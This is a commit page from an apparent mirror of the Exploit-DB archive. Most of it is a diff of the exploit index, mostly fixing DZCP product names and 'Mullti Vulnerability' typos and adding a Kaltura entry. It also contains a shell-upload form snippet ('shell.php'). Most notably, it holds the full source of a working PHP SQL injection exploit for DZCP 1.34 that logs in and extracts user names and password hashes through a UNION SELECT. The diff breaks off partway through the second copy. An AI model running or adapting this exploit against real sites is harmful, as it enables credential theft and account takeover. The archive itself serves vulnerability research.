bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-16

Browse source 
1 new exploits
This commit is contained in:
Offensive Security 2016-03-16 05:02:50 +00:00
parent 214a99ac52
commit 406c75cd13
6 changed files with 279 additions and 170 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

43
files.csv
View file

@ -1675,7 +1675,7 @@ id,file,description,date,author,platform,type,port
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
1968,platforms/php/webapps/1968.php,"DZCP (deV!L`z Clanportal) <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability",2006-07-01,"Hamid Ebadi",php,webapps,0
1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 (header.inc.php) Remote File Include Vulnerability",2006-07-01,OLiBekaS,php,webapps,0
@ -2551,7 +2551,7 @@ id,file,description,date,author,platform,type,port
2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (c)",2006-11-30,Expanders,windows,local,0
2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0
2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
2876,platforms/php/webapps/2876.txt,"deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
2876,platforms/php/webapps/2876.txt,"DZCP (deV!L`z Clanportal) <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection Vulnerability",2006-12-01,N/A,php,webapps,0
2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0
2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0
@ -3024,7 +3024,7 @@ id,file,description,date,author,platform,type,port
3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities",2007-02-21,Denven,php,webapps,0
3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit",2007-02-21,s0cratex,php,webapps,0
3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client <= 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0
3357,platforms/php/webapps/3357.txt,"deV!Lz Clanportal [DZCP] <= 1.4.5 - Remote File Disclosure Vulnerability",2007-02-21,Kiba,php,webapps,0
3357,platforms/php/webapps/3357.txt,"DZCP (deV!L`z Clanportal) <= 1.4.5 - Remote File Disclosure Vulnerability",2007-02-21,Kiba,php,webapps,0
3358,platforms/multiple/remote/3358.pl,"Oracle 10g KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0
3359,platforms/multiple/remote/3359.pl,"Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0
3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 (index.php func) Remote File Include Vulnerability",2007-02-22,JuMp-Er,php,webapps,0
@ -6523,7 +6523,7 @@ id,file,description,date,author,platform,type,port
6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0
6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection Vulnerability",2008-11-02,d3v1l,php,webapps,0
6960,platforms/php/webapps/6960.txt,"1st News - (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0
6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0
6961,platforms/php/webapps/6961.pl,"DZCP (deV!L`z Clanportal) <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0
6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0
6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0
6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0
@ -10588,7 +10588,7 @@ id,file,description,date,author,platform,type,port
11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0
11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0
11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,indoushka,php,webapps,0
11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,indoushka,php,webapps,0
11573,platforms/windows/local/11573.c,"MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0
11574,platforms/hardware/dos/11574.py,"iPhone WebCore::CSSSelector() Remote Crash Vulnerability",2010-02-24,t12,hardware,dos,0
@ -10733,7 +10733,7 @@ id,file,description,date,author,platform,type,port
11732,platforms/php/webapps/11732.txt,"Php-Nuke - Local File Include Vulnerability",2010-03-14,ITSecTeam,php,webapps,0
11733,platforms/php/webapps/11733.txt,"phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection",2010-03-14,"Easy Laster",php,webapps,0
11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0
11735,platforms/php/webapps/11735.php,"deV!L`z Clanportal 1.5.2 - Remote File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
11735,platforms/php/webapps/11735.php,"DZCP (deV!L`z Clanportal) 1.5.2 - Remote File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0
11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389
11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0
@ -10918,13 +10918,13 @@ id,file,description,date,author,platform,type,port
11943,platforms/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,php,webapps,0
11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - (.pls) Universal Stack Overflow Exploit",2010-03-28,mat,windows,local,0
11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
11948,platforms/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 - (.asx) Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software Mullti Vulnerability",2010-03-30,EL-KAHINA,php,webapps,0
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ITSecTeam,windows,dos,0
11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - (.asx) Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0
11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0
@ -10951,7 +10951,7 @@ id,file,description,date,author,platform,type,port
11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0
11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0
11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0
11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11989,platforms/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
11990,platforms/php/webapps/11990.txt,"Joomla Component com_network SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
11991,platforms/php/webapps/11991.txt,"Joomla Component com_tour SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
11992,platforms/php/webapps/11992.txt,"Joomla Component com_trading Blind SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
@ -11059,7 +11059,7 @@ id,file,description,date,author,platform,type,port
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 Exploit",2010-04-07,Rh0,multiple,local,0
12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) PoC (SEH) 0day",2010-04-07,ITSecTeam,windows,dos,0
12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,indoushka,php,webapps,0
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,indoushka,php,webapps,0
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0
12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion Vulnerabilities",2010-04-07,eidelweiss,php,webapps,0
12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles SQL Injection Vulnerability",2010-04-08,"pratul agrawal",php,webapps,0
12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability",2010-04-08,ZSploit.com,multiple,dos,0
@ -11360,10 +11360,10 @@ id,file,description,date,author,platform,type,port
12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup Vulnerability",2010-04-29,indoushka,php,webapps,0
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload Vulnerability and XSS",2010-04-29,Sid3^effects,php,webapps,0
12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
12449,platforms/php/webapps/12449.txt,"DZCP (deV!L`z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection Vulnerability",2010-04-29,"Justin C. Klein Keane",php,webapps,0
@ -11692,7 +11692,7 @@ id,file,description,date,author,platform,type,port
12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0
12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - (.zar) DoS",2010-05-31,TecR0c,windows,dos,0
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,indoushka,php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,indoushka,php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (RFI/XSS) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 - XSS Vulnerability",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
@ -11713,7 +11713,7 @@ id,file,description,date,author,platform,type,port
12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0
12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI Vulnerability",2010-06-03,Sid3^effects,php,webapps,0
12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,indoushka,php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,indoushka,php,webapps,0
12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor (phpsetimon) RFI / LFI Vulnerability",2010-06-03,eidelweiss,php,webapps,0
@ -13334,7 +13334,7 @@ id,file,description,date,author,platform,type,port
15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0
15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15323,platforms/php/webapps/15323.txt,"DZCP (deV!L`z Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15325,platforms/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15326,platforms/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0
@ -15935,8 +15935,8 @@ id,file,description,date,author,platform,type,port
18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0
18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0
18385,platforms/php/webapps/18385.txt,"deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
18386,platforms/php/webapps/18386.txt,"deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
18385,platforms/php/webapps/18385.txt,"DZCP (deV!L`z Clanportal) Gamebase Addon - SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
18386,platforms/php/webapps/18386.txt,"DZCP (deV!L`z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,metasploit,windows,remote,0
18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0
18390,platforms/php/webapps/18390.txt,"wordpress ucan post plugin <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0
@ -16085,7 +16085,7 @@ id,file,description,date,author,platform,type,port
18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0
18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0
18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0
18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
18558,platforms/php/webapps/18558.txt,"DZCP (deV!L`z Clanportal) Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0
18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0
18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0
@ -26246,7 +26246,7 @@ id,file,description,date,author,platform,type,port
29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability",2006-12-01,kcope,netbsd_x86,dos,0
29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.PHP IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0
29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure Vulnerability",2013-10-28,"Sebastián Magof",hardware,webapps,0
29207,platforms/php/webapps/29207.txt,"deV!Lz Clanportal 1.3.6 Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
29207,platforms/php/webapps/29207.txt,"DZCP (deV!L`z Clanportal) 1.3.6 - Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0
29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0
29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0
@ -35136,6 +35136,7 @@ id,file,description,date,author,platform,type,port
38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
38867,platforms/php/webapps/38867.txt,"Wordpress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
38868,platforms/php/webapps/38868.txt,"Wordpress Plugin Sell Download v1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0

Can't render this file because it is too large.

2
platforms/php/webapps/12857.txt
View file

@ -86,7 +86,7 @@ FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;
<input name="submit" type="submit" value=" Save " >

176
platforms/php/webapps/1968.php
View file

@ -1,88 +1,88 @@
<?
error_reporting(E_ERROR);
function exploit_init()
{
if (!extension_loaded('php_curl') && !extension_loaded('curl'))
{
if (!dl('curl.so') && !dl('php_curl.dll'))
die ("oo error - cannot load curl extension!");
}
}
function exploit_header()
{
echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
echo " oo ooooooo ooooooo\n";
echo " oooo oooo o888 o88 888 o888 888o\n";
echo " 888o888 888 o888 888888888\n";
echo " o88888o 888 o888 o 888o o888\n";
echo " o88o o88o o888o o8888oooo88 88ooo88\n";
echo "oooooooooooooooooooooooo dzcp 1.34 remote sql injection oooooooooooooooooooooooo\n";
echo "oo usage $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
echo "oo proxy support $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
echo " [proxy]:[port]\n";
echo "oo example $ php dzcp-134-exploit.php http://localhost x128 pwd 1\n";
echo "oo you need an account on the system\n";
echo "oo print the password of the user\n\n";
}
function exploit_bottom()
{
echo "\noo greets : tlm65 - i want to wish you a happy 23st birthday! thank you for\n";
echo " the last two years. we never become the fastest hacking group on\n";
echo " net without you.\n";
echo "oo discover : x128 - alexander wilhelm - 30/06/2006\n";
echo "oo contact : exploit <at> x128.net oo website : www.x128.net\n";
}
function exploit_execute()
{
$connection = curl_init();
if ($_SERVER['argv'][5])
{
curl_setopt($connection, CURLOPT_TIMEOUT, 8);
curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]);
}
curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($connection, CURLOPT_HEADER, 0);
curl_setopt ($connection, CURLOPT_POST, 1);
curl_setopt ($connection, CURLOPT_COOKIE, 1);
curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt');
curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt');
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=login&do=yes");
curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER['argv'][2] . "&pwd=" . $_SERVER['argv'][3] . "&permanent=1");
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
curl_setopt ($connection, CURLOPT_POST, 0);
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=x128");
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
preg_match("/FROM ([0-9a-zA-Z_]*)messages/", $source, $prefix);
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("-1 UNION SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4]));
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
preg_match("/>([0-9a-f]{32})</", $source, $password);
preg_match("/RE: (.*)\" class/", $source, $user);
if ($password[1])
{
echo "oo user " . $user[1] . "\n";
echo "oo password " . $password[1] . "\n\n";
echo "oo dafaced ...\n";
}
curl_close ($connection);
}
exploit_init();
exploit_header();
exploit_execute();
exploit_bottom();
?>
# milw0rm.com [2006-07-01]
<?
error_reporting(E_ERROR);
function exploit_init()
{
if (!extension_loaded('php_curl') && !extension_loaded('curl'))
{
if (!dl('curl.so') && !dl('php_curl.dll'))
die ("oo error - cannot load curl extension!");
}
}
function exploit_header()
{
echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
echo " oo ooooooo ooooooo\n";
echo " oooo oooo o888 o88 888 o888 888o\n";
echo " 888o888 888 o888 888888888\n";
echo " o88888o 888 o888 o 888o o888\n";
echo " o88o o88o o888o o8888oooo88 88ooo88\n";
echo "oooooooooooooooooooooooo dzcp 1.34 remote sql injection oooooooooooooooooooooooo\n";
echo "oo usage $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
echo "oo proxy support $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
echo " [proxy]:[port]\n";
echo "oo example $ php dzcp-134-exploit.php http://localhost x128 pwd 1\n";
echo "oo you need an account on the system\n";
echo "oo print the password of the user\n\n";
}
function exploit_bottom()
{
echo "\noo greets : tlm65 - i want to wish you a happy 23st birthday! thank you for\n";
echo " the last two years. we never become the fastest hacking group on\n";
echo " net without you.\n";
echo "oo discover : x128 - alexander wilhelm - 30/06/2006\n";
echo "oo contact : exploit <at> x128.net oo website : www.x128.net\n";
}
function exploit_execute()
{
$connection = curl_init();
if ($_SERVER['argv'][5])
{
curl_setopt($connection, CURLOPT_TIMEOUT, 8);
curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]);
}
curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($connection, CURLOPT_HEADER, 0);
curl_setopt ($connection, CURLOPT_POST, 1);
curl_setopt ($connection, CURLOPT_COOKIE, 1);
curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt');
curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt');
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=login&do=yes");
curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER['argv'][2] . "&pwd=" . $_SERVER['argv'][3] . "&permanent=1");
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
curl_setopt ($connection, CURLOPT_POST, 0);
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=x128");
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
preg_match("/FROM ([0-9a-zA-Z_]*)messages/", $source, $prefix);
curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("-1 UNION SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4]));
$source = curl_exec($connection) or die("oo error - cannot connect!\n");
